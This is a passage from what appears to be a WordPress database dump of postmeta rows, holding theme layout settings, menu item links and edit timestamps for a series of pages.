,6526,'_nectar_particle_rotation_timing',''),(6310,6526,'_nectar_particle_disable_explosion','off'),(6311,6526,'_nectar_page_header_alignment','left'),(6312,6526,'_nectar_page_header_alignment_v','middle'),(6313,6526,'_nectar_page_header_bg_alignment','center'),(6314,6526,'_nectar_header_bg_color',''),(6315,6526,'_nectar_header_font_color',''),(6316,6526,'_nectar_header_bg_overlay_color',''),(6317,6526,'_disable_transparent_header','off'),(6318,6526,'_force_transparent_header','off'),(6319,6526,'_wpb_vc_js_status','false'),(6321,6526,'_dp_original','6284'),(6322,6526,'_edit_lock','1514953600:1'),(6323,6526,'_edit_last','1'),(6324,6528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6325,6528,'_menu_item_type','post_type'),(6326,6528,'_menu_item_menu_item_parent','6286'),(6327,6528,'_menu_item_object_id','6526'),(6328,6528,'_menu_item_object','page'),(6329,6528,'_menu_item_target',''),(6330,6528,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6331,6528,'_menu_item_xfn',''),(6332,6528,'_menu_item_url',''),(6334,6529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6335,6529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6336,6529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6337,6529,'_wp_page_template','default'),(6338,6529,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6339,6529,'nectar-metabox-portfolio-display-sortable','off'),(6340,6529,'_nectar_full_screen_rows','off'),(6341,6529,'_nectar_full_screen_rows_animation','none'),(6342,6529,'_nectar_full_screen_rows_animation_speed','medium'),(6343,6529,'_nectar_full_screen_rows_overall_bg_color',''),(6344,6529,'_nectar_full_screen_rows_anchors','off'),(6345,6529,'_nectar_full_screen_rows_mobile_disable','off'),(6346,6529,'_nectar_full_screen_rows_row_bg_animation','none'),(6347,6529,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6348,6529,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6349,6529,'_nectar_full_screen_rows_footer','none'),(6350,6529,'_nectar_slider_bg_type','image_bg'),(6351,6529,'_nectar_canvas_shapes',''),(6352,6529,'_nectar_media_upload_webm',''),(6353,6529,'_nectar_media_upload_mp4',''),(6354,6529,'_nectar_media_upload_ogv',''),(6355,6529,'_nectar_slider_preview_image',''),(6356,6529,'_nectar_header_bg',''),(6357,6529,'_nectar_header_parallax','off'),(6358,6529,'_nectar_header_box_roll','off'),(6359,6529,'_nectar_header_bg_height',''),(6360,6529,'_nectar_header_fullscreen','off'),(6361,6529,'_nectar_header_title',''),(6362,6529,'_nectar_header_subtitle',''),(6363,6529,'_nectar_page_header_text-effect','none'),(6364,6529,'_nectar_particle_rotation_timing',''),(6365,6529,'_nectar_particle_disable_explosion','off'),(6366,6529,'_nectar_page_header_alignment','left'),(6367,6529,'_nectar_page_header_alignment_v','middle'),(6368,6529,'_nectar_page_header_bg_alignment','center'),(6369,6529,'_nectar_header_bg_color',''),(6370,6529,'_nectar_header_font_color',''),(6371,6529,'_nectar_header_bg_overlay_color',''),(6372,6529,'_disable_transparent_header','off'),(6373,6529,'_force_transparent_header','off'),(6374,6529,'_wpb_vc_js_status','false'),(6376,6529,'_dp_original','6284'),(6377,6529,'_edit_lock','1514953672:1'),(6378,6529,'_edit_last','1'),(6379,6531,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6380,6531,'_menu_item_type','post_type'),(6381,6531,'_menu_item_menu_item_parent','6286'),(6382,6531,'_menu_item_object_id','6529'),(6383,6531,'_menu_item_object','page'),(6384,6531,'_menu_item_target',''),(6385,6531,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6386,6531,'_menu_item_xfn',''),(6387,6531,'_menu_item_url',''),(6389,6532,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6390,6532,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6391,6532,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6392,6532,'_wp_page_template','default'),(6393,6532,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6394,6532,'nectar-metabox-portfolio-display-sortable','off'),(6395,6532,'_nectar_full_screen_rows','off'),(6396,6532,'_nectar_full_screen_rows_animation','none'),(6397,6532,'_nectar_full_screen_rows_animation_speed','medium'),(6398,6532,'_nectar_full_screen_rows_overall_bg_color',''),(6399,6532,'_nectar_full_screen_rows_anchors','off'),(6400,6532,'_nectar_full_screen_rows_mobile_disable','off'),(6401,6532,'_nectar_full_screen_rows_row_bg_animation','none'),(6402,6532,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6403,6532,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6404,6532,'_nectar_full_screen_rows_footer','none'),(6405,6532,'_nectar_slider_bg_type','image_bg'),(6406,6532,'_nectar_canvas_shapes',''),(6407,6532,'_nectar_media_upload_webm',''),(6408,6532,'_nectar_media_upload_mp4',''),(6409,6532,'_nectar_media_upload_ogv',''),(6410,6532,'_nectar_slider_preview_image',''),(6411,6532,'_nectar_header_bg',''),(6412,6532,'_nectar_header_parallax','off'),(6413,6532,'_nectar_header_box_roll','off'),(6414,6532,'_nectar_header_bg_height',''),(6415,6532,'_nectar_header_fullscreen','off'),(6416,6532,'_nectar_header_title',''),(6417,6532,'_nectar_header_subtitle',''),(6418,6532,'_nectar_page_header_text-effect','none'),(6419,6532,'_nectar_particle_rotation_timing',''),(6420,6532,'_nectar_particle_disable_explosion','off'),(6421,6532,'_nectar_page_header_alignment','left'),(6422,6532,'_nectar_page_header_alignment_v','middle'),(6423,6532,'_nectar_page_header_bg_alignment','center'),(6424,6532,'_nectar_header_bg_color',''),(6425,6532,'_nectar_header_font_color',''),(6426,6532,'_nectar_header_bg_overlay_color',''),(6427,6532,'_disable_transparent_header','off'),(6428,6532,'_force_transparent_header','off'),(6429,6532,'_wpb_vc_js_status','false'),(6431,6532,'_dp_original','6284'),(6432,6532,'_edit_lock','1514953770:1'),(6433,6532,'_edit_last','1'),(6434,6534,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6435,6534,'_menu_item_type','post_type'),(6436,6534,'_menu_item_menu_item_parent','6286'),(6437,6534,'_menu_item_object_id','6532'),(6438,6534,'_menu_item_object','page'),(6439,6534,'_menu_item_target',''),(6440,6534,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6441,6534,'_menu_item_xfn',''),(6442,6534,'_menu_item_url',''),(6444,6535,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6445,6535,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6446,6535,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6447,6535,'_wp_page_template','default'),(6448,6535,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6449,6535,'nectar-metabox-portfolio-display-sortable','off'),(6450,6535,'_nectar_full_screen_rows','off'),(6451,6535,'_nectar_full_screen_rows_animation','none'),(6452,6535,'_nectar_full_screen_rows_animation_speed','medium'),(6453,6535,'_nectar_full_screen_rows_overall_bg_color',''),(6454,6535,'_nectar_full_screen_rows_anchors','off'),(6455,6535,'_nectar_full_screen_rows_mobile_disable','off'),(6456,6535,'_nectar_full_screen_rows_row_bg_animation','none'),(6457,6535,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6458,6535,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6459,6535,'_nectar_full_screen_rows_footer','none'),(6460,6535,'_nectar_slider_bg_type','image_bg'),(6461,6535,'_nectar_canvas_shapes',''),(6462,6535,'_nectar_media_upload_webm',''),(6463,6535,'_nectar_media_upload_mp4',''),(6464,6535,'_nectar_media_upload_ogv',''),(6465,6535,'_nectar_slider_preview_image',''),(6466,6535,'_nectar_header_bg',''),(6467,6535,'_nectar_header_parallax','off'),(6468,6535,'_nectar_header_box_roll','off'),(6469,6535,'_nectar_header_bg_height',''),(6470,6535,'_nectar_header_fullscreen','off'),(6471,6535,'_nectar_header_title',''),(6472,6535,'_nectar_header_subtitle',''),(6473,6535,'_nectar_page_header_text-effect','none'),(6474,6535,'_nectar_particle_rotation_timing',''),(6475,6535,'_nectar_particle_disable_explosion','off'),(6476,6535,'_nectar_page_header_alignment','left'),(6477,6535,'_nectar_page_header_alignment_v','middle'),(6478,6535,'_nectar_page_header_bg_alignment','center'),(6479,6535,'_nectar_header_bg_color',''),(6480,6535,'_nectar_header_font_color',''),(6481,6535,'_nectar_header_bg_overlay_color',''),(6482,6535,'_disable_transparent_header','off'),(6483,6535,'_force_transparent_header','off'),(6484,6535,'_wpb_vc_js_status','false'),(6486,6535,'_dp_original','6284'),(6487,6535,'_edit_lock','1514953859:1'),(6488,6535,'_edit_last','1'),(6489,6537,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6490,6537,'_menu_item_type','post_type'),(6491,6537,'_menu_item_menu_item_parent','6286'),(6492,6537,'_menu_item_object_id','6535'),(6493,6537,'_menu_item_object','page'),(6494,6537,'_menu_item_target',''),(6495,6537,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6496,6537,'_menu_item_xfn',''),(6497,6537,'_menu_item_url',''),(6499,6538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6500,6538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6501,6538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6502,6538,'_wp_page_template','default'),(6503,6538,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6504,6538,'nectar-metabox-portfolio-display-sortable','off'),(6505,6538,'_nectar_full_screen_rows','off'),(6506,6538,'_nectar_full_screen_rows_animation','none'),(6507,6538,'_nectar_full_screen_rows_animation_speed','medium'),(6508,6538,'_nectar_full_screen_rows_overall_bg_color',''),(6509,6538,'_nectar_full_screen_rows_anchors','off'),(6510,6538,'_nectar_full_screen_rows_mobile_disable','off'),(6511,6538,'_nectar_full_screen_rows_row_bg_animation','none'),(6512,6538,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6513,6538,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6514,6538,'_nectar_full_screen_rows_footer','none'),(6515,6538,'_nectar_slider_bg_type','image_bg'),(6516,6538,'_nectar_canvas_shapes',''),(6517,6538,'_nectar_media_upload_webm',''),(6518,6538,'_nectar_media_upload_mp4',''),(6519,6538,'_nectar_media_upload_ogv',''),(6520,6538,'_nectar_slider_preview_image',''),(6521,6538,'_nectar_header_bg',''),(6522,6538,'_nectar_header_parallax','off'),(6523,6538,'_nectar_header_box_roll','off'),(6524,6538,'_nectar_header_bg_height',''),(6525,6538,'_nectar_header_fullscreen','off'),(6526,6538,'_nectar_header_title',''),(6527,6538,'_nectar_header_subtitle',''),(6528,6538,'_nectar_page_header_text-effect','none'),(6529,6538,'_nectar_particle_rotation_timing',''),(6530,6538,'_nectar_particle_disable_explosion','off'),(6531,6538,'_nectar_page_header_alignment','left'),(6532,6538,'_nectar_page_header_alignment_v','middle'),(6533,6538,'_nectar_page_header_bg_alignment','center'),(6534,6538,'_nectar_header_bg_color',''),(6535,6538,'_nectar_header_font_color',''),(6536,6538,'_nectar_header_bg_overlay_color',''),(6537,6538,'_disable_transparent_header','off'),(6538,6538,'_force_transparent_header','off'),(6539,6538,'_wpb_vc_js_status','false'),(6541,6538,'_dp_original','6287'),(6542,6538,'_edit_lock','1514953951:1'),(6543,6538,'_edit_last','1'),(6544,6540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6545,6540,'_menu_item_type','post_type'),(6546,6540,'_menu_item_menu_item_parent','6289'),(6547,6540,'_menu_item_object_id','6538'),(6548,6540,'_menu_item_object','page'),(6549,6540,'_menu_item_target',''),(6550,6540,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6551,6540,'_menu_item_xfn',''),(6552,6540,'_menu_item_url',''),(6554,6541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6555,6541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6556,6541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6557,6541,'_wp_page_template','default'),(6558,6541,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6559,6541,'nectar-metabox-portfolio-display-sortable','off'),(6560,6541,'_nectar_full_screen_rows','off'),(6561,6541,'_nectar_full_screen_rows_animation','none'),(6562,6541,'_nectar_full_screen_rows_animation_speed','medium'),(6563,6541,'_nectar_full_screen_rows_overall_bg_color',''),(6564,6541,'_nectar_full_screen_rows_anchors','off'),(6565,6541,'_nectar_full_screen_rows_mobile_disable','off'),(6566,6541,'_nectar_full_screen_rows_row_bg_animation','none'),(6567,6541,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6568,6541,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6569,6541,'_nectar_full_screen_rows_footer','none'),(6570,6541,'_nectar_slider_bg_type','image_bg'),(6571,6541,'_nectar_canvas_shapes',''),(6572,6541,'_nectar_media_upload_webm',''),(6573,6541,'_nectar_media_upload_mp4',''),(6574,6541,'_nectar_media_upload_ogv',''),(6575,6541,'_nectar_slider_preview_image',''),(6576,6541,'_nectar_header_bg',''),(6577,6541,'_nectar_header_parallax','off'),(6578,6541,'_nectar_header_box_roll','off'),(6579,6541,'_nectar_header_bg_height',''),(6580,6541,'_nectar_header_fullscreen','off'),(6581,6541,'_nectar_header_title',''),(6582,6541,'_nectar_header_subtitle',''),(6583,6541,'_nectar_page_header_text-effect','none'),(6584,6541,'_nectar_particle_rotation_timing',''),(6585,6541,'_nectar_particle_disable_explosion','off'),(6586,6541,'_nectar_page_header_alignment','left'),(6587,6541,'_nectar_page_header_alignment_v','middle'),(6588,6541,'_nectar_page_header_bg_alignment','center'),(6589,6541,'_nectar_header_bg_color',''),(6590,6541,'_nectar_header_font_color',''),(6591,6541,'_nectar_header_bg_overlay_color',''),(6592,6541,'_disable_transparent_header','off'),(6593,6541,'_force_transparent_header','off'),(6594,6541,'_wpb_vc_js_status','false'),(6596,6541,'_dp_original','6287'),(6597,6541,'_edit_lock','1514954015:1'),(6598,6541,'_edit_last','1'),(6599,6543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6600,6543,'_menu_item_type','post_type'),(6601,6543,'_menu_item_menu_item_parent','6289'),(6602,6543,'_menu_item_object_id','6541'),(6603,6543,'_menu_item_object','page'),(6604,6543,'_menu_item_target',''),(6605,6543,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6606,6543,'_menu_item_xfn',''),(6607,6543,'_menu_item_url',''),(6609,6544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6610,6544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6611,6544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6612,6544,'_wp_page_template','default'),(6613,6544,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6614,6544,'nectar-metabox-portfolio-display-sortable','off'),(6615,6544,'_nectar_full_screen_rows','off'),(6616,6544,'_nectar_full_screen_rows_animation','none'),(6617,6544,'_nectar_full_screen_rows_animation_speed','medium'),(6618,6544,'_nectar_full_screen_rows_overall_bg_color',''),(6619,6544,'_nectar_full_screen_rows_anchors','off'),(6620,6544,'_nectar_full_screen_rows_mobile_disable','off'),(6621,6544,'_nectar_full_screen_rows_row_bg_animation','none'),(6622,6544,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6623,6544,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6624,6544,'_nectar_full_screen_rows_footer','none'),(6625,6544,'_nectar_slider_bg_type','image_bg'),(6626,6544,'_nectar_canvas_shapes',''),(6627,6544,'_nectar_media_upload_webm',''),(6628,6544,'_nectar_media_upload_mp4',''),(6629,6544,'_nectar_media_upload_ogv',''),(6630,6544,'_nectar_slider_preview_image',''),(6631,6544,'_nectar_header_bg',''),(6632,6544,'_nectar_header_parallax','off'),(6633,6544,'_nectar_header_box_roll','off'),(6634,6544,'_nectar_header_bg_height',''),(6635,6544,'_nectar_header_fullscreen','off'),(6636,6544,'_nectar_header_title',''),(6637,6544,'_nectar_header_subtitle',''),(6638,6544,'_nectar_page_header_text-effect','none'),(6639,6544,'_nectar_particle_rotation_timing',''),(6640,6544,'_nectar_particle_disable_explosion','off'),(6641,6544,'_nectar_page_header_alignment','left'),(6642,6544,'_nectar_page_header_alignment_v','middle'),(6643,6544,'_nectar_page_header_bg_alignment','center'),(6644,6544,'_nectar_header_bg_color',''),(6645,6544,'_nectar_header_font_color',''),(6646,6544,'_nectar_header_bg_overlay_color',''),(6647,6544,'_disable_transparent_header','off'),(6648,6544,'_force_transparent_header','off'),(6649,6544,'_wpb_vc_js_status','false'),(6651,6544,'_dp_original','6287'),(6652,6544,'_edit_lock','1514954081:1'),(6653,6544,'_edit_last','1'),(6654,6546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6655,6546,'_menu_item_type','post_type'),(6656,6546,'_menu_item_menu_item_parent','6289'),(6657,6546,'_menu_item_object_id','6544'),(6658,6546,'_menu_item_object','page'),(6659,6546,'_menu_item_target',''),(6660,6546,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6661,6546,'_menu_item_xfn',''),(6662,6546,'_menu_item_url',''),(6664,6547,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6665,6547,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6666,6547,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6667,6547,'_wp_page_template','default'),(6668,6547,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6669,6547,'nectar-metabox-portfolio-display-sortable','off'),(6670,6547,'_nectar_full_screen_rows','off'),(6671,6547,'_nectar_full_screen_rows_animation','none'),(6672,6547,'_nectar_full_screen_rows_animation_speed','medium'),(6673,6547,'_nectar_full_screen_rows_overall_bg_color',''),(6674,6547,'_nectar_full_screen_rows_anchors','off'),(6675,6547,'_nectar_full_screen_rows_mobile_disable','off'),(6676,6547,'_nectar_full_screen_rows_row_bg_animation','none'),(6677,6547,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6678,6547,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6679,6547,'_nectar_full_screen_rows_footer','none'),(6680,6547,'_nectar_slider_bg_type','image_bg'),(6681,6547,'_nectar_canvas_shapes',''),(6682,6547,'_nectar_media_upload_webm',''),(6683,6547,'_nectar_media_upload_mp4',''),(6684,6547,'_nectar_media_upload_ogv',''),(6685,6547,'_nectar_slider_preview_image',''),(6686,6547,'_nectar_header_bg',''),(6687,6547,'_nectar_header_parallax','off'),(6688,6547,'_nectar_header_box_roll','off'),(6689,6547,'_nectar_header_bg_height',''),(6690,6547,'_nectar_header_fullscreen','off'),(6691,6547,'_nectar_header_title',''),(6692,6547,'_nectar_header_subtitle',''),(6693,6547,'_nectar_page_header_text-effect','none'),(6694,6547,'_nectar_particle_rotation_timing',''),(6695,6547,'_nectar_particle_disable_explosion','off'),(6696,6547,'_nectar_page_header_alignment','left'),(6697,6547,'_nectar_page_header_alignment_v','middle'),(6698,6547,'_nectar_page_header_bg_alignment','center'),(6699,6547,'_nectar_header_bg_color',''),(6700,6547,'_nectar_header_font_color',''),(6701,6547,'_nectar_header_bg_overlay_color',''),(6702,6547,'_disable_transparent_header','off'),(6703,6547,'_force_transparent_header','off'),(6704,6547,'_wpb_vc_js_status','false'),(6706,6547,'_dp_original','6290'),(6707,6547,'_edit_lock','1514954153:1'),(6708,6547,'_edit_last','1'),(6709,6549,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6710,6549,'_menu_item_type','post_type'),(6711,6549,'_menu_item_menu_item_parent','6292'),(6712,6549,'_menu_item_object_id','6547'),(6713,6549,'_menu_item_object','page'),(6714,6549,'_menu_item_target',''),(6715,6549,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6716,6549,'_menu_item_xfn',''),(6717,6549,'_menu_item_url',''),(6719,6550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6720,6550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6721,6550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6722,6550,'_wp_page_template','default'),(6723,6550,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6724,6550,'nectar-metabox-portfolio-display-sortable','off'),(6725,6550,'_nectar_full_screen_rows','off'),(6726,6550,'_nectar_full_screen_rows_animation','none'),(6727,6550,'_nectar_full_screen_rows_animation_speed','medium'),(6728,6550,'_nectar_full_screen_rows_overall_bg_color',''),(6729,6550,'_nectar_full_screen_rows_anchors','off'),(6730,6550,'_nectar_full_screen_rows_mobile_disable','off'),(6731,6550,'_nectar_full_screen_rows_row_bg_animation','none'),(6732,6550,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6733,6550,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6734,6550,'_nectar_full_screen_rows_footer','none'),(6735,6550,'_nectar_slider_bg_type','image_bg'),(6736,6550,'_nectar_canvas_shapes',''),(6737,6550,'_nectar_media_upload_webm',''),(6738,6550,'_nectar_media_upload_mp4',''),(6739,6550,'_nectar_media_upload_ogv',''),(6740,6550,'_nectar_slider_preview_image',''),(6741,6550,'_nectar_header_bg',''),(6742,6550,'_nectar_header_parallax','off'),(6743,6550,'_nectar_header_box_roll','off'),(6744,6550,'_nectar_header_bg_height',''),(6745,6550,'_nectar_header_fullscreen','off'),(6746,6550,'_nectar_header_title',''),(6747,6550,'_nectar_header_subtitle',''),(6748,6550,'_nectar_page_header_text-effect','none'),(6749,6550,'_nectar_particle_rotation_timing',''),(6750,6550,'_nectar_particle_disable_explosion','off'),(6751,6550,'_nectar_page_header_alignment','left'),(6752,6550,'_nectar_page_header_alignment_v','middle'),(6753,6550,'_nectar_page_header_bg_alignment','center'),(6754,6550,'_nectar_header_bg_color',''),(6755,6550,'_nectar_header_font_color',''),(6756,6550,'_nectar_header_bg_overlay_color',''),(6757,6550,'_disable_transparent_header','off'),(6758,6550,'_force_transparent_header','off'),(6759,6550,'_wpb_vc_js_status','false'),(6761,6550,'_dp_original','6290'),(6762,6550,'_edit_lock','1514954224:1'),(6763,6550,'_edit_last','1'),(6764,6552,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6765,6552,'_menu_item_type','post_type'),(6766,6552,'_menu_item_menu_item_parent','6292'),(6767,6552,'_menu_item_object_id','6550'),(6768,6552,'_menu_item_object','page'),(6769,6552,'_menu_item_target',''),(6770,6552,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6771,6552,'_menu_item_xfn',''),(6772,6552,'_menu_item_url',''),(6774,6553,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6775,6553,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6776,6553,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6777,6553,'_wp_page_template','default'),(6778,6553,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6779,6553,'nectar-metabox-portfolio-display-sortable','off'),(6780,6553,'_nectar_full_screen_rows','off'),(6781,6553,'_nectar_full_screen_rows_animation','none'),(6782,6553,'_nectar_full_screen_rows_animation_speed','medium'),(6783,6553,'_nectar_full_screen_rows_overall_bg_color',''),(6784,6553,'_nectar_full_screen_rows_anchors','off'),(6785,6553,'_nectar_full_screen_rows_mobile_disable','off'),(6786,6553,'_nectar_full_screen_rows_row_bg_animation','none'),(6787,6553,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6788,6553,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6789,6553,'_nectar_full_screen_rows_footer','none'),(6790,6553,'_nectar_slider_bg_type','image_bg'),(6791,6553,'_nectar_canvas_shapes',''),(6792,6553,'_nectar_media_upload_webm',''),(6793,6553,'_nectar_media_upload_mp4',''),(6794,6553,'_nectar_media_upload_ogv',''),(6795,6553,'_nectar_slider_preview_image',''),(6796,6553,'_nectar_header_bg',''),(6797,6553,'_nectar_header_parallax','off'),(6798,6553,'_nectar_header_box_roll','off'),(6799,6553,'_nectar_header_bg_height',''),(6800,6553,'_nectar_header_fullscreen','off'),(6801,6553,'_nectar_header_title',''),(6802,6553,'_nectar_header_subtitle',''),(6803,6553,'_nectar_page_header_text-effect','none'),(6804,6553,'_nectar_particle_rotation_timing',''),(6805,6553,'_nectar_particle_disable_explosion','off'),(6806,6553,'_nectar_page_header_alignment','left'),(6807,6553,'_nectar_page_header_alignment_v','middle'),(6808,6553,'_nectar_page_header_bg_alignment','center'),(6809,6553,'_nectar_header_bg_color',''),(6810,6553,'_nectar_header_font_color',''),(6811,6553,'_nectar_header_bg_overlay_color',''),(6812,6553,'_disable_transparent_header','off'),(6813,6553,'_force_transparent_header','off'),(6814,6553,'_wpb_vc_js_status','false'),(6816,6553,'_dp_original','6290'),(6817,6553,'_edit_lock','1514954339:1'),(6818,6553,'_edit_last','1'),(6819,6555,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6820,6555,'_menu_item_type','post_type'),(6821,6555,'_menu_item_menu_item_parent','6292'),(6822,6555,'_menu_item_object_id','6553'),(6823,6555,'_menu_item_object','page'),(6824,6555,'_menu_item_target',''),(6825,6555,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6826,6555,'_menu_item_xfn',''),(6827,6555,'_menu_item_url',''),(6829,6556,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6830,6556,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6831,6556,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6832,6556,'_wp_page_template','default'),(6833,6556,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6834,6556,'nectar-metabox-portfolio-display-sortable','off'),(6835,6556,'_nectar_full_screen_rows','off'),(6836,6556,'_nectar_full_screen_rows_animation','none'),(6837,6556,'_nectar_full_screen_rows_animation_speed','medium'),(6838,6556,'_nectar_full_screen_rows_overall_bg_color',''),(6839,6556,'_nectar_full_screen_rows_anchors','off'),(6840,6556,'_nectar_full_screen_rows_mobile_disable','off'),(6841,6556,'_nectar_full_screen_rows_row_bg_animation','none'),(6842,6556,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6843,6556,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6844,6556,'_nectar_full_screen_rows_footer','none'),(6845,6556,'_nectar_slider_bg_type','image_bg'),(6846,6556,'_nectar_canvas_shapes',''),(6847,6556,'_nectar_media_upload_webm',''),(6848,6556,'_nectar_media_upload_mp4',''),(6849,6556,'_nectar_media_upload_ogv',''),(6850,6556,'_nectar_slider_preview_image',''),(6851,6556,'_nectar_header_bg',''),(6852,6556,'_nectar_header_parallax','off'),(6853,6556,'_nectar_header_box_roll','off'),(6854,6556,'_nectar_header_bg_height',''),(6855,6556,'_nectar_header_fullscreen','off'),(6856,6556,'_nectar_header_title',''),(6857,6556,'_nectar_header_subtitle',''),(6858,6556,'_nectar_page_header_text-effect','none'),(6859,6556,'_nectar_particle_rotation_timing',''),(6860,6556,'_nectar_particle_disable_explosion','off'),(6861,6556,'_nectar_page_header_alignment','left'),(6862,6556,'_nectar_page_header_alignment_v','middle'),(6863,6556,'_nectar_page_header_bg_alignment','center'),(6864,6556,'_nectar_header_bg_color',''),(6865,6556,'_nectar_header_font_color',''),(6866,6556,'_nectar_header_bg_overlay_color',''),(6867,6556,'_disable_transparent_header','off'),(6868,6556,'_force_transparent_header','off'),(6869,6556,'_wpb_vc_js_status','false'),(6871,6556,'_dp_original','6290'),(6872,6556,'_edit_lock','1514954435:1'),(6873,6556,'_edit_last','1'),(6874,6558,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6875,6558,'_menu_item_type','post_type'),(6876,6558,'_menu_item_menu_item_parent','6292'),(6877,6558,'_menu_item_object_id','6556'),(6878,6558,'_menu_item_object','page'),(6879,6558,'_menu_item_target',''),(6880,6558,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6881,6558,'_menu_item_xfn',''),(6882,6558,'_menu_item_url',''),(6884,6559,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6885,6559,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6886,6559,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6887,6559,'_wp_page_template','default'),(6888,6559,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6889,6559,'nectar-metabox-portfolio-display-sortable','off'),(6890,6559,'_nectar_full_screen_rows','off'),(6891,6559,'_nectar_full_screen_rows_animation','none'),(6892,6559,'_nectar_full_screen_rows_animation_speed','medium'),(6893,6559,'_nectar_full_screen_rows_overall_bg_color',''),(6894,6559,'_nectar_full_screen_rows_anchors','off'),(6895,6559,'_nectar_full_screen_rows_mobile_disable','off'),(6896,6559,'_nectar_full_screen_rows_row_bg_animation','none'),(6897,6559,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6898,6559,